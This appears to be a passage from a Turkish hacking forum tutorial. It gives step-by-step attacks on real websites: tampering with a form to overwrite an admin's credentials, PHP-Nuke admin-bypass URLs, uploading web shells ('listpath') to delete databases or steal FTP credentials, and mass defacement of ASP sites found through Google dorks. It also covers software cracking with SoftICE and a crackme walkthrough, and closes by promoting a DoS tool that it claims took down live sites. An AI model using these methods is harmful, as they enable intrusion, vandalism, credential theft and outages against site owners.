yoksahttp://www.hedeftekisite.com/varsa_alt_klasr/ u ekleyelim, sonra type="hidden" name="xxx" value="xxx" yazan yere type="hidden" name="xxx" value="adminin_nicki" yazalm, veya type="hidden" type="text" eklinde deitirip, dosyay .htm formatnda kaydedelim. Eer ikinci dediimi yaparsanz, .htm uzantl dosyay altrdmzda karmza eski nickimizin olduu bir kutucuk daha kacak, oradaki yazy silip adminin nickini yazmak yoluyla da bu ii hlledebiliriz. rnein, oynama yaptmzda kod yle olacak: <form action="http://www.hedeftekisite.com/guncelle.asp" method="post"> <input type="hidden" name="islenecekkullaniciadi" value="Sitenin_Admininin_kullandigi_nick"> (Veya <input type="text" name="islenecekkullaniciadi" value="adminin_nickini_buraya_yaz"> ) <input type="text" name="yenikullaniciadi" value="adminin_nicki_ne_olacaksa_onu_yazn"> <input type="password" name="yenisifre" value="adminin_sifresi_ne_olacaksa_onu_yazin"> .... <input type="submit" value="Bilgilerimi Gncelle"></form>

Bilgileri, yukarda belirttiim ekilde deitireceksiniz. Bu arada benim rnekte .... ile gsterdiim yerde eitli kutucuklar daha olmas lzm, mesel mail adresi, web sitesi gibi. Buralar da kendinize gre uyarlamalsnz. Tm bunlar yaptktan sonra kaydettiimiz ve zerinde oynamalar yaptmz .htm dosyasn altrn, ilgili bilgileri girdikten sonra "bilgilerimi gncelle" dmesine basn ve admin nick ve ifresini deitirmi olun! Geriye kalan, sadece bu deitirdiiniz kullanc ad ve ifreyle sitenin ye giri formunu sslemek ve "gnder"e basmak... Bu yntemin almama ihtimali var, bunun iki sebebi olabilir; birincisi bu -kdn nlemi alnmtr, ikincisi ise bir yanllk yaptnz, sitenin klasr dzeni uygunsuz veya formda ufak bir farkllk var. Bu ikinci nedeni HTML bilen arkadalar kolaylkla atlatabilirler. Ben sadece rnek verdiim iin burada uzatmayacam. Zaten anlam olmanz lzm... Bir PHP-Nuke A: PHP-Nuke eski versiyonlarnda ileyen bir ak: http://www.hedef.com/modules.php?na...me=kullaniciadi Bunu adres barnza yazacaksnz ve sondaki kullaniciadi yerine Administratorn sitede kulland nicki yazacaksnz. Belki tutar, eski PHP-Nuke srmlerinde... Bir PHP-Nuke a daha: www.hedef.com/modules/forums/admin/index.php Nadiren de olsa sizi ifresiz olarak admin paneline sokabilir. Sonras malum... Aklarla hackingin temel mantn anlamanz iin bu kadar rnek yeterli. Birincisi an kullanacanz dillerle ilgili iyi bir bilgi sahibi olmalsnz, ikincisi bildiklerinizi kmsemeden -lamerlik-mamerlik demeden- yaratclnz kullanacaksnz ve ncs ise en yeni aklar takip edeceksiniz. Bu tip aklar, mesel Cyber-security.org, olympos.org, * Yasak Kelime Kullandnz *.org, securityfocus.com gibi "Ben gvenlik portalym" diyen yerlerden renebilirsiniz, nk bu siteler "bakn... byle byle bir ak var, bunu kapatmazsanz yle-byle olur, o yzden u a u ekilde kapatn" derken, ayn zamanda anda ne olduunu dile getirdiklerinden, ok faydal olabilirler )... Bir baka hack yntemi ise Listpath kullanmaktr. Bunlar, serverdaki klasr ve dosyalar grmemizi, onlar arasnda dolamamz ve onlar zerinde baz ilemler yapmamz salayan ASP veya PHP dosyalardr. Bu dosyalar sitenin hostingine bir ekilde szdrrz. Eer hosting bilgisayarnda, yani serverda FileSystemObject a varsa (tabii ki windows sistemlerde bu ak olabilir, linuxta baka isimler alr bu ak), dosya silebilir, ieriklerini deitirebilirsiniz. nce bu listpathlerden birini bir bilgisayarn hostuna yutturuyoruz. Bunun baz yntemleri var. te birka: * Brinkster, Websamba vs. gibi ASP destei veren Web Sitelerinden kendimize bir hesap, yani bir bele web sitesi ayoruz. Sonra bir listpath upload ediyoruz ve browsern adres ksmna yolunu yazp altryoruz. * Baz sitelerde upload zellii vardr. googleda inurl:upload filetype:asp gibi eitli aramalarla ASP dosyalarn uploada izin veren yerlere listpathin adn deitirerek upload edebiliriz (rnein test.asp gibi. Dikkat ekmemesi iin...) Upload ettikten sonra dosyann yolunu yazar ve altrrz *Yasak Kelime*i, veya dier listpath programcklarn... * Hedefteki sitenin host firmasndan deneme hostu alrz. Bazen gerek bile olmayabilir; zira FTP Kullanc ad: deneme ifre: deneme eklinde hazr bir deneme hostu olabilir servern bnyesinde. Neyse... Siteye whois ekildiinde, genelde en altta yazan

ns1.xxx.com , ns2.xxx.com eklindeki yerler hosting irketinin sitesini verir. Buradan 1 aylk deneme hostu alr ve listPathi yklersiniz, sonra da paa paa altrp hostta cirit atarsnz. Ya da para verip bir host alrsnz. (ASP destekli olmak zorunda) Bu gibi yntemlerle listpathi upload ettikten sonra, yolunu yazarak altrabiliriz. Kullanmlar aslnda listpathten listpathe deiir ama genelde klasrler arasnda dolaabilmek iin linkler bulunur, srclere ulamak iin dmeler bulunur ve dosyalar silip deitirmek, (hatta *Yasak Kelime*li ekerde download etmek) iin linkler bulunabilir, bunlar artk siz listpathten renebilirsiniz. yle bir gz gezdirerek, neyin ne olduunu anlarsnz zaten. imdi de birka bilgi vereyim yine bu konuyla ilgili. Eer bir yere ASP listpathi yklerseniz inetpub klasrne ve oradan da wwwroot klasrne gitmelisiniz. Genellikle burada tutulur sitelerin dosyalar... Eer burada yoksa dier dizinleri de deneyebilirsiniz. Ama elinizi mmkn olduunca abuk tutun ve mmknse Proxy kullanarak IPnizi gizleyin, her ihtimale kar... Hacklemeyi plnladnz bir sitenin dosyalarn silmeyi ve kendi dosyanz upload etmeyi deneyin. Eer olmazsa, o serverda FileSystemObject a yok demektir. O zaman size den, MDB dosyalarn bulmak. Baz Listpathlerde (mesel *Yasak Kelime*liekerde), dosya arama kutular bulunur. Buralara mdb yazn ve kan dosyalar indirin. Eer byle bir ey yoksa sitenin klasrlerini kartrmalsnz... Eski konularda MDBlerle ne yapabileceinizi anlatmtm, isterseniz 1. ve 2. blme geri dnp hatrlayabilirsiniz... unu da syleyeyim, MDBleri ille de download etmek zorunda deilsiniz, MDB dosyalarn silerseniz siteyi almaz hle getirrirsiniz. Bozarsnz yani... Bunun dnda, c rogram filesserv-userv-u.ini dosyasn da download edip FTP kullanc ad ve ifrelerine de ulaabiliriz. Bu da aklnzda bulunsun... Aslnda en iyi ve zevkli hack yntemi bu tip listpath programlarn kullanmaktr bence. ASP iin *Yasak Kelime*li eker gibi Listpathleri kullanabilirsiniz -ki en iyi ASP listpathtir diyebilirim-. Bunun dnda PHP destekleyen serverlar iin yaplm listpathlerde var. Burada link veremiyorum, ynetimden izin almaya vaktim olmad, ama en azndan isim vereyim, remView isimli bir PHP listpath var... Evet arkadalar, herkesin yapabilecei, bir konu zerinde uzmanlk ve fazlaca bilgi gerektirmeyen hacking yntemleri ksaca bunlar. Bunlardan sonras ise, zerine ap-ayr, bal bana dkmanlar yazlabilecek uzun ve yeniler iin anlalmas zor konular. Ve bunun dnda, daha fazla ilerlemek iin en azndan JavaScript, ASP, PHP, CGI, PERL, C Dili, Unix/Linux, SQL, .... gibi konularda en azndan temel bilginiz olmas gerekiyor ki, tam anlamyla kendinize "hacker" diyebilin. HTML zaten bilmek zorundasnz . Yoksa anlatlan bir ok eyi anlayamamanz kuvvetle muhtemel. Bu dkmanda size herkezin uygulayabilecei balca hacking yntemlerini anlatmaya altm ve mant kavratmak iin bu kadar ey yazdm. Bundan sonras sizin rendiklerinizi misyonumuz dahilinde -kesinlikle kmsemeden- pratie dkmenize ve yukarda saydm konular hakknda bilgi toplamaya balamanza kalm. Tekrar sylyorum; rendiklerinizi pratie dkmek iin almanz ok nemli. CW bu konuda size nemli bir kaynaklk tekil edecektir. Anlamadklarnz sormanz hlinde size yardm edecek ok fazla insan var burada. Kymetini bilin reshackn... Bu yntemlerle de ok eyler yapabilirsiniz aslna bakarsanz. Ama bilgisayar ve hacking konusunda ilerlemek isteyenlerin yukarda saydm konularn yansra programlama ile ilgili bilgi sahibi olmas lazm bilmem anlatabildim mi

Cracking nedir cracking ksa olarak program krma da denilebilir. Program krabilmek iin assembly dilini bilmeniz lazmdr. dongle ad verilen donanmlarla korunan programlar iin ise iyi derecede assembly dilini bilmeniz lazmdr. Assembly nedir Assembly bir programlama dilidir. Bu dil ilk bilgisayarclarn kefettii bir dildir. lk programclar makine dili komutlar ile programlar yazmaktaydlar. Makina dili ilemciye veri bitlerinin hexdecimal say sisteminde gsterilmesiyle olumu bir dildir. yani ilk programlar 0 ve 1 saylaryla yazlyordu. ve bu saylarla assembly dili gelitirildi assembly dili ile ilemlerin ingilizce karlklarnn ksaltmalarndan oluuyordu. Program Nasl Krlr Eer amacnz programlar cretsiz veya snrsz kullanmak ise bu zorlu ie girmenize hi gerek yok www.astalavista.com da programn crackini bulabilrisiniz. Fakat cracker olmak istiyorsanz balayabilirsiniz. Program krabilmek iin programclktan da anlamanz gerekiyor. Programlar en basitinden debug programlaryla krlr bu programlarla krmak istediiniz programn o anda yapt illemleri takip edersiniz dolaysyla ifre yanl hatas verdii an takip ettiinizde ifre ye ulaabilir veya ifrenin algortimasn zebilirsiniz Program Krmak iin gerekenler 1- Sabr 2- Assembly dilini bilmek 3- Windows u iyi derecede bilmek 3- Gerekli programlara sahip olmak Gerekli Programlar En nemlisi debug program olan softice, disassembler program Windasm, Hex editr program Hiew (Hackers View) bunlardan baka iinizi kolayltracak ekstra programlar da var. rnein Visual Basic programlar iin SmartCheck Delphi programlar iin Dede vb. Programlarn linklerini vermiyorum siz google de bulabilirsiniz eer bulamayacak kadar bilgisayarda bilgisizseniz bu itende vazgemelisiniz. SoftIce Kullanma klavuzu alntdr ---------------------------------------------------------------------------------------------------SofICE Kurulumu SoftICE iyi bir ekilde kurup ayarlamazsanz gerekli verimi alamazsnz.Kurulum ekrannda nemli olan 3 nokta var Video Adapter Mouse Video

Ekran kart ayarlar SoftICE'n almas iin ok gereklidir.Bu ayarlar yanl yaparsanz SoftICE kullanmanz mmkn olmyabilir.Bu ayarlara ok dikat edin.lk olarak ekran kartnz listede varsa onu sein.Daha sonra Test tuu ile alp almadnz kontrol edin.Eer ekran kartnz listede yoksa yahut ilerde problem yaarsanz ekran kart olarak "Universal Video Driver" seeneini sein. Mouse Mouse unuzun tipi neyse ona uygun mouseu sein.Yanl mouse u seerseniz SoftICE saptabilir o yzden dikkatli olun. SoftICE'n Ayarlanmas SofICE i iyi ayarlyamazsanz programdan faydalanamazsnz.lk olarak bir boot mens oluturalm bylelikle windows her aldnda bize SofICE ile alp almycan sorsun.Autoexec.bat ve config.sys dosyalarn aadaki gibi deitirin. Eer iletim sisteminiz WinME ise http://icedump.******** adresinden wmloader indirin ve readme dosyas okuyun. Autoexec.bat dosya rnei. !!!!Sizin autoexec.bat dosyanzn sonuna bu satrlar ekleyin.Eer baa eklerseniz sorun yapar.!!! Rem -----Buradan itibaren kopyalayn------goto %config% REM Load SoftICE - SoftICE in kurulu oldugu yer onemli !! :SICE C:\PROGRA~1\NUMEGA\SOFTIC~1\WINICE.EXE REM SoftICE olmadan baslangic :NORM Rem ----Buradan kesin-----Config.sys dosya rnei. !!!!Sizin config.sys dosyanzn sonuna bu satrlar ekleyin.Eer baa eklerseniz sorun yapar.!!! Rem -----Buradan itibaren kopyalayn------REM Meny olustur. [MENU] MENUITEM NORM,Windows 98 MENUITEM SICE,SoftICE ile Windows 98 MENUDEFAULT NORM,5 [NORM] [SICE] Rem ----Buradan kesin-----Benim kullandm winice.dat dosyasn download edin ve SoftICE n kurulu olduu klasre kopyalayn.Winice.dat 'a yaptnz her deiikliin etkili olabilmesi iin yeniden windowsun balatlmas lazm.Bu yzden program kurduktan sonra winice.dat deitirip yle restart atn SoftICE Komutlar SoftICE kurmamza ramen etkili bir ekilde kullanmay renmek o kadar kolay

deildir.Kullana kullana sizde bir eyler reneceksiniz.Fakat burada SoftICE 'n nasl kullanldna dair bir ka rnek verelim SoftICE a gemek iin Ctrl ve D tuuna ayn anda basn.Bu btn programlar durduracak ve sizi SoftICE ekranna gtrecetir. SoftICE a geince bir ka pencere ve deiik bilgiler greceksiniz.Alttaki pencere bizim komutlar yazdmz input penceresi.Baz komutalar yle.. x = SoftICE dan k. bpx = SoftICE a belli api kodlarnda dur emri bpm = SoftICE a belli bellek blgelerinde dur emri bpr = Belli hafza blegelerinde dur emri d = Bellei ve orada yazan deerleri gster e = Bellekteki deerleri deitirir cls = Input penceresini temizle. s 0 l ffffffff 'text'= Hafzada text yazsn arar rnek vermek gerekirse bpx getdlgitemtexta SoftICE a bu api kodunu grnce dur komutunu verir bpm 0157:0009AC2D SoftICE a o bellee eriildii zaman dur komutunu verir. bpr 0157:00643345 0157:00643345 iki yer arasnda bir yere eriildii zaman dur komutunu verir d 00456787 o blgedeki bellekteki deerleri gsterir. d eax eax registerinin belirttii yerdeki bellei gsterir.

Birde input penceresinde kullandmz komutalardan da bahsedelim. bl = O andaki breakpointleri gsterir((00) BPX #0028:09876543 C=01 gibi) bc = O anda konulmu break pointleri temizler (bc 1 bir nolu breakpointi siler.) bd = Break pointi kapatir(bd 0 0 nolu breakpointi kapatr) be = Break pointi aar (be 0, kapatlan 0 nolu breakpointi aar) ? = Belli bir register veya saynn deerini gsterir.( ? 23 # gibi)

SoftICE Problemleri Bu problemlerin %90 winice.dat dosyasn dzenlemediiniz iin olmaktadr. Uyar: Problemlerinize gemeden nce ltfen winice.dat dosyasn download edip SoftICE kurduunuz klasre kopyalayn. 1. SoftICE a geiyorum breakpoint koyunca symbol not defined diyor. - Breakpoint koyduunuz dll winice.dat dosyasnda bulunmuyor demektir.Kernel32.dll user32.dll vs yi winice.dat dosyasnda bulun ve o satrn en bandaki ; i kaldrn. 2. Bazen SoftICE a kendiliinden geiyor ve bir daha geriye dnemiyorum. - R tuuna basn ve daha sonra faults off yazn. 3. Ctrl+D kombinasyonunu Alt+Z eklinde nasl deitirebilirim; - winice.dat dosyasnn INIT ksmn u ekilde deitirin INIT="code on; altscr off; lines 60; wc 32; wd 8; faults off;ALTKEY ALT Z;X;"

4. Ekran boyutunu nasl deitirebilirim. - wc,wd lines deerlerini deitirerek bunu yapabilirsiniz. 5. SoftICE bir sr loading unloading vs mesajlar gsteriyor bunu nasl kapatabilirim - winice.dat an ve VERBOSE=OFF satrn ekleyin.Yahut loader32.exe yi an.Edit/SoftICE initializing settings den "Disable diagnostic messages" sein. 6. Init ksmna eklediim komutlar almyor. - Init ksmna eklenen komutlar ; ile birbirinden ayrlmal ve en sonunda X; olmaldr.X komutu SoftICE dan k demek oldupundan eer X; den sonra komut eklerseniz bunlar almycaktr.Ksacas init ksm yle olmaldr. INIT="command1;command2;...;commandn;X;" 7. Bazen SoftICE girdiim zaman mouse deli gibi oynamaya balyor.Hi bir ey yapamyorum.Bu olay bazen SoftICE dan ktm zamanda oluyor. - Bu olay mouse ilem yaparken SoftICE a geildii zaman oluyor.Bu yzden mouse un senkronizasyonu bozuluyor.Bunu dzeltemek iin bir ka kez Ctrl+M tuuna basn.Bir ka kez bastktan sonra mouse eski haline dnecektir. Eer bu olay windows ortamna getiinizde olursa Ctrl+Alt+Del tularna bir kez tklayn Task Manager geldiinde hemen Esc ile kn.Buda mouse u eski haline getirecektir. 8. Bir program HKLM\Software\DandikSoft\Serial diye bir keyi okuyor.Ben bpx regqueryvalueexa eklinde breakpoint koyuyorum ama SoftICE yzlerce kez duruyor.Sadece belli keye ulald zaman nasl durdurabilirim. - Bu soruyu biraz aklyarak cevap vermek istiyorum bunu iyi anlarsanz ok iinize yarar.imdi ilk olarak RegqueryValueexa fonkisyonu ne ie yarar ve hangi parametreler yollanr ona bir bakalm.win32.hlp dosyasn ayoruz ve unu gryoruz LONG RegQueryValueEx( HKEY hKey, // arlacak keyin handle LPTSTR lpszValueName, // alncak deerinin isminin olduu adres LPDWORD lpdwReserved, // sakl LPDWORD lpdwType, // deer tipinin adresi LPBYTE lpbData, // fonksiyon sonucunun adresi LPDWORD lpcbData // fonksiyon sonuc adresinin bykl ); Bu fonksiyon stdcall eklinde bir fonksiyon yani parametreler en sondan balayarak push ediliyor.Siz bu breakpointi koyup SoftICE getiiniz zaman ESP u ekilde olacaktr ... [ESP+18h] - lpcbData [ESP+14h] - lpData &lt;&lt; Buraya fonksiyonun sonucu geliyor. [ESP+10h] - lpType [ESP+0Ch] - lpReserved [ESP+08h] - lpValueName &lt;&lt; Alncak olan deerin ismi. [ESP+04h] - hKey [ESP+00h] - return EIP &lt;&lt; Call'n yapld adres.

Yani SoftICE durduu zaman biz dd esp+14 yazarsak fonksiyonun sonucunun nereye yazldn grrz.Yahut dd esp+8 yazarsak hangi anahtarn arldn bulabiliriz.imdi bizim istediimiz sadece bir keyden okunduu zaman durdurmak.Aadaki breakpoint iimiz grecektir.

BPX RegQueryValueExA IF *(ESP-&gt;8) == 'Seri' DO "D ESP-&gt;14;" Eer program Seri ile balayan bir keyden bir ey okursa dur.sterseniz bu nasl oluyor bir bakalm *(ESP-&gt;8) demek esp+8 in gsterdii yerdeki ierik demek.Bildiiniz zere push edilenler dword olduu iin yani 4 byte biz sadece 4 haneyi okuyabiliyoruz.Eer esp+8 in gsterdii yerde Seri yazyorsa, Do d esp-&gt;14 de esp+14 blgesi yani sonucun alnd blgeyi gster demek.Bu ekilde yazmak uzun olabilir o yzden macro ile bu ii halletmek en gzeli.Bu makroyu winice.dat dosyasna ekliyebilirsiniz eer ekli deilse MACRO bpreg="bpx regqueryvalueexa if*(esp-&gt;8)=='%1' do \"d esp-&gt;14\"" %1 demek macroya gnderilen parametre demek \ iaretlerini eklememizin sebebi SoftICE, " iaretlerini macro bitii kabul ettii iin biz \ iareti ile " lar yok saydryoruz. eer Serial keyine ulaldnda durmasn istiyorsanz SoftICE da iken artk sadece unu yazmanz yeterli olucak bpreg Seri Dikkat edin sadece ve sadece ilk drt karakteri giriyorsunuz. Bu ekilde macrolar gelitirebilirsiniz.Mesela bunu getwindowtexta veya getdlgtemtexta ya uygulayp sadece sizin isminiz istendiinde SoftICE a gemek vs .Unutmamanz gerek fonksiyona gnderilen parametreler ve bunlar ESP de grnd durum.Her bir parametre bir dword da oluyor.Yani sadece ilk dworda erime ansmz var. Umarm bu ipular size faydal olur. --------------------------------------------------------------------------------------------------------------------------------------Winice.dat dosyasn adidascrack.*********.com/winice.zip burdan indirebilirsiniz (eer indirmede sorun yaarsanz www.mynet.com a girip adres satrn adidascrack.*********.com/winice.zip yazn.

Hiew Kullanmak Klavuzu

F1 Dosya hakknda bilgiler verir F2 Marj ayarlamas yapar/ayar kaldrr F3 Dosyay A/H/T moduna dntrr F4 Modu belirler F5 Verilen adrese gider (A/H modu iin) F6 Linefeed, satr ayarlamas yapar. F7 A/H/T modunda arama yapar, E modunda crypt eder. F8 A/H modunda header, T modunda XLAT, E modunda XOR F9 A/H/T modda dosya aar, E modda dosyay gnceller F10 A/H/T modunda programdan kar Alt-P Ekran bir dosya olarak saklar. Alt-R Dosyay yeniden ykler. Ctrl-F3 Bul/deitir

Ctrl-F7 Ayn kritere gre sonrakini ara Ctrl-F8 nceki dosyaya geer Ctrl-F9 Sonraki dosyaya geer + Satr iaretler (Bookmark) Alt-(1..8) aretlenen satra gider Alt-- Geerli bookmark siler Assembly Dili Hakknda Bilgi Assembly Dili Hakknda Biraz Bilgi Kullanlan belli bal assembly komutlarn basite aklamaya altm, bunlar bilmeden hareket edemeyiz. mov komutu; Bu komut registerlere deer atamak iin kullanlr. mov eax, 8 ,bu komuttan sonra eax=8 olacaktr. mov eax, ebx ,ebx eax'e kopyalanr. cmp komutu; Karlatrma komutudur. Arkasndan da sonuca gre ya devam edilir, yada baka bir ksma atlanr. Buray atlamak iin ise je, jz komutlar kullanlmaktadr. cmp eax, ecx ,burada sadece eax, ecx ile karlatrlmaktadr. Herhangi bir dallanma yok. jmp komutu; artsz dallanma komutudur. Program baka bir satra ynlendirilir. jmp 00415265 ,ile program bu 415265 adresine ynlendirilir. je komutu; Karlatrma sonucu eit ise belirtilen adrese zplanr. ncesinde ise genelde yukarda gsterilen cmp ile iki deer karlatrlmtr. cmp eax, ecx je 00415265 ,eax deeri ile ecx deeri birbirine eit ise 415265 adresine zplanr, deilse program olduu yerden devam edecektir. jne komutu; Karlatrma sonucu eit deil ise belirtilen adrese zplanr. cmp eax, ecx

jne 00415265 ,eax deeri ecx deerine eit deil ise 415265 adresine zplanr. call- ret komutlar; call komutunun kullanld yerde program belirtilen adrese gider ve buras procedur diye adlandrlr.Buradaki komut dizisi ilenir ve ret komutunun kullanld yerde program tekrar dner, call komut satrnn altndaki adresten devam eder. call 00415265 , program 00415265 adresine gider, bu procedur ilenir ve tekrar dner. add komutu; Toplama komutudur. add eax, 5 ,eax deeri eax+5 olacaktr. add eax, ebx ,eax yerine ebx deeride eklenerek eax'e yazlr. inc komutu; Devamndaki registerin deerini 1 arttrr. inc eax ,eax deeri bu komut sonras eax+1 olacaktr. dec komutu; Devamndaki registerin deerini 1 azaltr. dec eax ,eax deeri bu komut sonras eax-1 olacaktr. push-pop komutlar; Baz deerler tekrar lazm olacaklar ise bunlar stack' a atabiliriz, yani bir sre saklayabiliriz. Bunun iin push komutunu kullanrz, tekrar armak iin ise pop komutunu kullanrz. push eax ,eax yna atlr, pop eax , eax tekrar arlr. Breakpointler bpx getdlgitemtexta : Sizin girdiiniz deerler kontrol edilecekse kullanlabilir, bpx getwindowtexta : Yukardaki breakpointin alternatifi, bpx hmemcpy : Visual basic ile yazlm programlarda yukardakiler ie yaramaz, byle zamanlarda kullanlr, bpx messageboxa : Programlarn verdii baz hata mesajlarn yada nag ekranlarn bununla yakalayabiliriz,

bpx getsystemtime : Zaman kontrol yapld durumlarda kullanlr, bpx getlocaltime : Zaman kontrol iin dier alternatif, bpx createfilea : Dosya kontrol yapldnda crc snamalarnda kullanlabilir, Softice kontrolu iinde kullanlmaktadr. bpx readfilea : Dosya kontrol iin dier alternatif. bpx regqueryvalueexa : Register kontrol iin kullanlmaktadr. lk Programn krlmas

lk Program Krma imdi Yeni Balayanlar iin basit bir crack anlatalm. program adidascrack.*********.com/1.zip den indirin Artk crackme'yi krmaya balayabiliriz. Program atk, sallama seriali girdik, Ctrl-D yaptk ve SoftIce ald. imidi breakpoint koyalm (GetDlgItemTextA) ve softice'dan kalm(X yazp enterlayabilirsiniz.).Ve PassMe'de Chack diyelim. Hooop SoftIce geldi. winice.dat dosyasn softice yi kurduunuz klasre kopyalamazsanz softice brakpointeri koyarken hata alrsnz. Bir kere F11'e basn ve calldan kp aaya gelin: 017F:00401056 FF15701D4000 CALL [USER32!GetDlgItemTextA] 017F:0040105C 3C08 CMP AL,08 &lt;------- 8 karakterlik bir serial girip girmediinizi kontrol eder. 017F:0040105E 7590 JNZ 00400FF0 017F:00401060 BFC2114000 MOV EDI,004011C2 &lt;-- yazy EDI'ye tar 017F:00401065 33C9 XOR ECX,ECX 017F:00401067 33D2 XOR EDX,EDX 017F:00401069 33F6 XOR ESI,ESI 017F:0040106B 8A0F MOV CL,[EDI] &lt;------ ilk karakteri CL'nin iine tar 017F:0040106D 8A5701 MOV DL,[EDI+01] &lt;--- ikinci karakteri 'nin iine tarn DL 017F:00401070 80FA00 CMP DL,00 &lt;--------- yaznn ulap ulamadn kontrol eder 017F:00401073 7409 JZ 0040107E &lt;------ evetse, jump(atla) 017F:00401075 01D1 ADD ECX,EDX 017F:00401077 01CE ADD ESI,ECX 017F:00401079 83C702 ADD EDI,02 017F:0040107C EBED JMP 0040106B 017F:0040107E 01CE ADD ESI,ECX imdi 00401056 daki olay anlam olmanz lazm. nk burada yazdmz serialin 8 karakter olup olmadn kontro edecek. Program ilk 4haneyi son 4 haneye ekliyor. Tabiki bu HEX'de oluyor. Hex'de 1 = 31, 2 = 32, 3=33 gibi. imdi kodlar F10 ile

trace edip aya gelince daha iyi anlayacaksnz. EAX=34333231 EBX=0063FC34 ECX=38373635 EDX=00000000 ESI=455B455B EDI=00401300 EBP=0063FBE0 ESP=0063FBE0 EIP=0040109E o d I s Z a P c CS=0167 DS=016F SS=016F ES=016F FS=12E7 GS=0000 PASSME!+12F4 bytePROT(0) 016F:004012F4 00 00 00 00 00 00 00 00-00 00 00 00 31 32 33 34 ............1234 016F:00401304 35 36 37 38 00 00 00 00-00 00 00 00 00 00 00 00 5678............ 016F:00401314 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ 016F:00401324 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................ PROT32 0167:00401092 BF00134000 MOV EDI,00401300 0167:00401097 33C0 XOR EAX,EAX 0167:00401099 8B07 MOV EAX,[EDI] 0167:0040109B 8B4F04 MOV ECX,[EDI+04] 0167:0040109B 8B4F04 MOV ECX,[EDI+04] 0167:0040109E 01C8 ADD EAX,ECX --&gt;EAX ECX'e Eklenmi 0167:004010A0 3BC6 CMP EAX,ESI 0167:004010A2 7402 JZ 004010A6 ;Good cracker 0167:004010A4 EB2E JMP 004010D4 ;Bad cracker ECX registeri "5678" (35363738) deerini tutuyor. Satr 0167:0040109E 'da EAX ECX 'e eklenmi. Ve sonra ESI (455B455B) deerinde bunlar karlatrlr. Eer eitseler: satr 004010A6 'a atlar Bu iyi birey nk Crackme'yi krdn. Ama eer eit deilse yeniden dene.. Yazar bu programnda deiik bir algoritma kullanm ve ilk drt karakter ile son drt karakteri yer deitirmi, bu nedenle bie den fazla serialimiz oluyor. unlar deneyin: pass1:-!-!.$.$ pass2:-$-$.!.! pass3:-$-!.!.$ pass4:-#-#."." pass5:."."-#-# pass6:-#."."-#

asp destekli siteleri kertme!!! Oncelile program indirelim http://www.e-bilisim.org/issdata.zip http://www.e-bilisim.org/sitebulma.rar Simdi "Finde Site" adl program calistirin ve "Key wor" yazan yerin altna Ornek : hk filetype:asp yazn burda hk ulkelerin alan ad ksaltlamar (Kuzey Kore) buraya baska uzantlar da yaza blirsiniz tr (turkiye) gibi domain uzantlarn mcuma.sitemynet.com/ulke.htm burdan bula bilirsiniz burda ki her uzanty arama yaparken kulana bliirisniz. "filetype:asp"de asp destekli serverlar yada asp dosyalar bulunan siteleri armamz saglar. (ikiside ayn seyler zaten :-P yada benzeR ne farkeder :-) )

(burda ki amac asp destekli siteleri bulmak, google daki arama tekniklerini iyi bi sekilde biliyosanz daha cok site bulabilirsiniz) hk filetype:asp yazdktan sonra "Capture Links" diyoz we siteleri bulmaya baslyo arama bitikten sonra tumunu seciyoz ve bi Metin belgesine kaydediyoz (*txt) Sonra "DavS" adl program acyoz "Criar" yazan yerin altnda ekliycemiz dosyann adnn yazyoz ben "/madboyiso.htm" yazdm sonra "Setar texto...." yazan yerin altnada bisiler salyoz ben :-) " Hacked y gecekusu_always |-)" (isterseniz html kodlar yada asp kodlar da kulana bilirsiniz yanlz asp kod kulancanz zaman /demonsgod.htm yerine /demonsgod.asp yazmalsnz) yazdm sonra "listar" diyoz ve kaydetigimiz metin belgesini acyoz ( hani su arama yaptgmz siteleri metin belgesine atmstk ya onu :-P ) "Start Scan..." dedikmi hack etmeye baslyoz... "Pages Own.." yazan yerin altna dusen siteleri hack etmis oluyoz..

NA Security Tester mthi birey mutlaka bakmalsnz --------------------------------------------------------------------------------

Evet Beyler imdi Size ok Sper Bir Programdan bahsedeceim Programn Ad : NA Security Tester v2.9 Beta 3 Programn Teknii : GET Buffer Overflow An Kullanarak DoS ( Denial OF Service) ataklara kar sunucu gvenliini test eder Etkiledii Sistemler : Btn Windows Serverver Versiyonlar Btn Linux Srmleri Btn IIS , Apache vb Sunucu Yazlmlarnn tm Versiyonlar Tm Donanmsal ve Yazlmsal Korumalar Routerlar Friwaller Gvenlik zm : Yaplan Yzlerce Teste uan in Herhangi Bir zm Bulunamad Aklama : Bu program yukarda yazld gibi GET Buffer overflow an kullarak socket handle dediimiz handle leri sunucu tarafna yollar ve ar efor sarf etmesini salar. sunucu ar efor sarf ederek normal ziyaretilerden gelen isteklere cevap veremez duruma gelir ve evirim d olur. Yazlm 1.0 - 1.5 - 2.0 - 2.5 - 2.6 - 2.7 -2.8 versiyonlar daha nce kmtr ve security ile ilgilen bir ok kii bu programdan haberi vardr sanrum Suanki En Son Versiyon 2.9 beta 3 Program ok Etkili Bir Programdr Yazlm Gelitirilme sreci boyunca yaplan yzlerce hatta binlerce test te etkisi kantlanmtr. program ile kendi sitenizin veya gvenlik hizmeti verdiiniz mterilerinizin sunucularnn testini yapabilirsiniz. Programla daha nce yaplan testlerde btn donanmsal ve yazlmsal korumalar ( router , friwall , vb) ile korunan sitelerin / sunucularn yazlmdan etkilendii ve evirim d kald testpit edilmitir. Hatta www.ddos.com sitesi DoS ataklara kar binlerce dolarlk koruma satan bir firma ama programla Tek bir pc den 256K ADSL balantda 60 thread la yaplan test sonucu site kapanmtr ve test srasnda bir yandan msn ak chat yaplyor bir yandan srf yaplyor yani balanty kasmadan ayrca msn de online olan kiilere sitenin online olup olmad sorulmutur verilen cevap site kapal yine www.cisco.com sitesi dnyann en nde gelen router friwall reticidir. html siteleri olmalarna ramen 2 ayr pc den yaplan e zamanl test sonucu www.cisco.com sitesi de evirim d olmutur bu ahitlerde ispatlanmtr.

Download url 1: indirmek iin tklayn

Program Yardm ve Kullanmak ekli --------------------------------------

Program aadaki ekilde kullanrsanz maksimum verim alrsnz:

